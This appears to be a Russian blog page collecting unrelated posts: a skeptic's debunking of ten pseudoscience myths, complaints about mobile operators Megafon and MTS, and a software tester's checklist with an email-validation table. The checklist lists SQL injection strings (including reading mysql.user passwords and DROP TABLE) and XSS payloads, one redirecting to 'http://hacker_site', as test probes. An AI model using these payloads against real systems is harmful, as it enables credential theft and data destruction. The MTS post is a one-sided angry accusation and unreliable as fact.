29.04.2019

«Вакцины опасны для здоровья?» Топ-10 заблуждений (кратко)

Разбору распространенных заблуждений можно посвящать часовые лекции и целые книги. В данном посте я расскажу что не так с десятью популярными мифами максимально коротко – всего в трех словах и трех предложениях. Краткость заставляет выбирать те аргументы, которые кажутся наиболее существенными.

1. У воды есть память. Нет. Это было опровергнуто. Ученый Жак Бенвенист утверждал, что вода, в которой раньше побывали антитела, оказывает иное воздействие на клетки человека, чем обычная вода. Но оказалось, что эти эксперименты не воспроизводятся, если экспериментаторы не знают, где какая вода во время оценки воздействия. Теперь мы знаем, что водородные связи в воде перемешиваются за десятки фемтосекунд.

Подробнее см.: http://klnran.ru/wp-content/uploads/2017/02/m02_p4_water.pdf

2. Соционика работает. Нет. Центральная предельная теорема. Она гласит, что «если результат наблюдения является суммой многих случайных слабо взаимозависимых величин, каждая из которых вносит малый вклад относительно общей суммы, то при увеличении числа слагаемых распределение центрированного и нормированного результата стремится к нормальному». Свойства личности, как правило, зависят от огромного количества слабо взаимозависимых факторов – как генетических, так и социальных. Поэтому большинство людей имеют близкое к среднему значение того или иного психологического признака, а не делятся на отчетливые «типы».

Подробнее см.: https://scinquisitor.livejournal.com/152955.html

3. Астрология работает. Нет. Время рождения несущественно. На разнообразие людей влияет куча факторов: гены, внутриутробное развитие, воспитание. Роли этих факторов посвящены тысячи научных публикаций. Влияние положения звезд или планет в момент рождения на характер человека не подтверждено ни одной проверкой (за тысячи лет существования астрологии!)

Подробнее см.: https://scinquisitor.livejournal.com/85815.html

4. Гомеопатия лечит. Нет. Там нечему лечить. Действие лекарств основано на взаимодействии между молекулами препарата и молекулами, из которых состоит человек или заразившие его организмы. Гомеопатические препараты получают путем последовательных многократных разведений вплоть до полного отсутствия действующего вещества. Поэтому действие гомеопатического препарата не может отличаться от действия растворителя (воды или спирта) или сахара, если речь идет о сахарных гомеопатических шариках.

Подробнее см.: http://klnran.ru/2017/02/memorandum02-homeopathy/

5. ГМО опасней обычных организмов. Нет. Все организмы – мутанты. Новые мутации неизбежно возникают в каждом поколении. Не важно, каким методом внесена мутация, важны лишь ее последствия. Генная инженерия позволяет вносить генетические изменения более точечно, чем при селекции.

Подробнее см.: https://youtu.be/hFTw4kIKQq4

6. Вакцины опасны для здоровья. Нет. Когда в организм человека попадает патогенный микроорганизм, клетки иммунной системы, способные распознать его и обезвредить, размножаются. Такая реакция будет и на настоящий патоген, и на его ослабленную версию или отдельные компоненты (как в случае вакцин). С той разницей, что, в отличие от патогена, вакцина не вызывает связанную с ним болезнь.

Подробнее см.: https://biomolecula.ru/articles/vaktsiny-v-voprosakh-i-otvetakh

7. ВИЧ не вызывает СПИД. Нет. ВИЧ вызывает СПИД. Доказательств связи ВИЧ и СПИД полно, но я ограничусь одной статьей: HIV-1 and the aetiology of AIDS в журнале Lancet (1993 год). В течение восьми лет авторы наблюдали за здоровьем 365 ВИЧ-положительных и 350 ВИЧ-отрицательных людей. 136 человек заболели СПИД – и все они были из группы ВИЧ-положительных.

Подробнее см.: https://youtu.be/6FwlRkMNuTk

8. Теология – это наука. Нет. Теология – не религиоведение. «Теология – учение о Боге, о его атрибутах и о мире, сотворенном Господом Богом, а религиоведение – это знание о религии. Задача теологии – утвердить человека в вере, задача религиоведения – дать знания о религии» (Фридрих Овсиенко). Ближайшая параллель к «теологии» — это как если бы фольклорист пропитался ценностями записываемой мифологии и начал доказывать, что мир возник из плаценты, которая вышла последом, когда Первоженщина родила Солнце от Койота (Дмитрий Браткин).

Подробнее см.: https://scinquisitor.livejournal.com/105480.html

9. Телегония работает. Нет. Экспериментально не подтвердилось. Первая научная проверка эффекта телегонии была сделана в 1889 году Кассаром Юартом. Кобыл сначала скрещивали с зебрами, а потом с жеребцами своего вида. Влияние первого партнера на последующее потомство не подтвердилось ни в этих опытах, ни в последующих на других видах млекопитающих.

Подробнее см.: https://www.skeptik.net/pseudo/telegon.htm

10. Теория эволюции – это лишь теория. Да. Как теория микробов. Не стоит путать теории (наиболее глубокое и системное знание о некотором предмете) и гипотезы – недоказанные, но проверяемые предположения. Наличие общего предка у всех живых организмов подтверждается не только палеонтологическими, биогеографическими и общебиологическими свидетельствами, но и современными знаниями молекулярной биологии, такими как принципиальное единство генетического кода и сходство эволюционных деревьев, полученных для отдельных генов. Альтернативные гипотезы (креационизм, разумный замысел) давно отброшены научным сообществом и встречаются в серьезных рецензируемых научных журналах не чаще, чем гипотезы о вечных двигателях или действенности астрологии.

Подробнее см.: https://ru.wikipedia.org/wiki/Доказательства_эволюции



Источник: ЖЖ Юзер scinquisitor

Очередная история про то, как мегафон ворует деньги абонентов

Очередная тру история о том как сотовые операторы, в частности Мегафон разводит людей на деньги. Помните, все операторы жулики и мошенники, единственное что им от вас надо, это ваши деньги.

Если коротко, по сути, то мегафон в лучших традициях жанра подрубил платную услугу, а потом имели наглость не отключать её.

Подробнее в твиттере пользователя @WaII_E



27.04.2019

МТС - Мошенники

Два года назад был скандал. Когда кто-то взломал телеграмм аккаунты двух пользователей, причём сделали это путём перехвата СМС. Взломщики не были топ-про, по этому просто договорились с МТС. Фишка в том, что МТС всё отрицало, но как выяснилось просто врали.

Далее цитата с тлгрм канала IT уголовные дела СОРМ Россиюшка
Охренеть, конечно. Какие же фантастические лжецы и гэбэшные подстилки.
Не думал, что меня сегодня может что-то так сильно выбесить, но МТС не подвёл.
Помните историю со взломом Telegram-аккаунтов Албурова и Козловского, которая случилась два года назад?
Напомню хронологию событий:
1. Ночью МТС выключает Албурову и Козловскому услугу SMS.
2. МТС выключает им доступ в интернет (чтобы не пришёл пуш в Telegram сначала кодом для входа, затем и о самом логине в аккаунт).
3. Злоумышленники перехатывают SMS и входят в аккаунты. Сну Албурова и Козловского ничего не мешает.
Так вот, Козловский наконец-то дошёл до суда с МТС, в котором он пытается понять, какого чёрта они отключали SMS и интернет.
И на суде всплыл прекраснейший документ, в котором МТС прямо говорит: наш сотрудник отключил SMS, потому были попытки атаки на номер через ОКС-7.
И добавляют: «Возможные мошеннические действия в отношении абонента Козловского, такие как онлайн-банкинг, денежные переводы, переадресации вызовов и т.д. были предотвращены специалистами ПАО МТС»
Просто прекрасно!
У меня четыре вопроса:
1. Каким образом отключение услуги SMS предотвращает перехват SMS через ОКС-7?
2. Какого чёрта вы отключали интернет?! Какую атаку по ОКС-7 можно предотвратить, отключив абоненту интернет?
3. Вам не стыдно вот так нагло врать, что вы что-то там предотвратили? Или вы думали, что эту чушь кроме следователя никто больше не увидит?
Идиоты, Олег Козловский — упорный, а на дворе 2019 год.
4. «Никаких целенаправленных действий по отключению услуг не производилось. Не исключаю вероятности вирусной атаки или доступа к аккаунту через веб-интерфейс». — Дмитрий Солодовников, пресс-секретарь группы МТС.
Это что же получается, вы всё это время врали? Такая огромная и уважаемая компания, и нагло врала всем нам два года?
И в конце просто феерия:
«Пресс-служба МТС заявила TJ, что компания не получала иск, а Козловский, по их мнению, занимается «самопиаром».
Самопиаром?! А может всё таки не Олег отключил себе SMS и интернет, а вы? И потом два года врали, что этого не делали?
Это Олег сейчас продолжает врать о какой-то защите от атак?
Отключайтесь от МТС. Это гэбэшные прихвостни, которые помогут слить вас по щелчку.
Они врали тогда, врут сейчас и будут врать потом.
Нельзя доверять лжецам ничего — от своих денег (хотя бы из самоуважения), до услуг связи, на которые завязана ваша жизнь.
Многие читают и думают: «все операторы такие», или «мне нечего скрывать», или «ну я точно никому не нужен».
В России — бандитское государство, и любой человек может попасть под интересы спецслужб, даже если он «сидит тихо и не высовывается».
Бандиты, которых крышует государство, ограбят вас, перехватив SMS от банка — а вы об этом даже не узнаете благодаря МТС.
Вы перейдёте кому-то дорогу, бандиты в государстве сольют вашу переписку из соцсети или мессенджера, перехватив SMS, чтобы шантажировать вас, а вы об этом даже не узнаете. Кто поможет? Правильно, МТС.
И нет, не «все такие». Эти истории, по какому-то удивительному совпадению, происходят только с МТС.
Нет ни одного известного случая отключения услуг SMS и интернета под предлогом «борьбы с атаками» другими операторами; только МТС сливает все SMS за несколько лет.
Перейти на другого оператора можно очень просто: приходите в офис любого другого оператора с паспортом и попросите перенести свой номер МТС к ним.

05.04.2019

Чек-листы для проверки XSS, SQL- и HTML-инъекций

В продолжение темы чек-листов для тестировщиков ПО. Будете учиться, знаете где списать)
SQL-инъекции кавычка '
OR '1'='1'
' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '
12345) AND 1=1--:hash
SELECT user(); или SELECT system_user();
SELECT host, user, password FROM mysql.user;
SELECT database()
DROP TABLE user;




XSS <script>alert("xss-injection!")</script>
<script>document.getElementByID("...").disabled=true</script>
<script>window.parent.location.href='http://hacker_site';</script>
<img src=javascript:alert('xss-injection!')>
<input onclick="javascript:alert('xss-injection');">
<b onmouseover="alert('xss-injection!')">Hello</b>




HTML-инъекции </body>
<textarea />
<input></input>
<form action="http://google.com"><input type="submit"></form>

Чек-лист для проверки поля email для тестеров

Проверка Ожидаемый результат
1 Пустое поле email Сообщение о незаполненном поле email
2 Email в нижнем регистре Значение поля принимается
3 Email в верхнем регистре Значение поля принимается
4 Email с цифрами в имени пользователя Значение поля принимается
5 Email с цифрами в доменной части Значение поля принимается
6 Email с дефисом в имени пользователя Значение поля принимается
7 Email с дефисом в доменной части Значение поля принимается
8 Email со знаком подчеркивания в имени пользователя Значение поля принимается
9 Email со знаком подчеркивания в доменной части Значение поля принимается
10 Email с точками в имени пользователя Значение поля принимается
11 Email с несколькими точками в доменной части Значение поля принимается
12 Email без точек в доменной части Сообщение о некорректном email
13 Превышение длины email (>320 символов) Сообщение о некорректном email
14 Отсутствие @ в email Сообщение о некорректном email
15 Email с пробелами в имени пользователя Сообщение о некорректном email
16 Email с пробелами в доменной части Сообщение о некорректном email
17 Email без имени пользователя Сообщение о некорректном email
18 Email без доменной части Сообщение о некорректном email
19 Некорректный домен первого уровня (допустимо 2-6 букв после точки: .ru) Сообщение о некорректном email
20 Email с кириллическим доменным именем (login@домен.рф) ?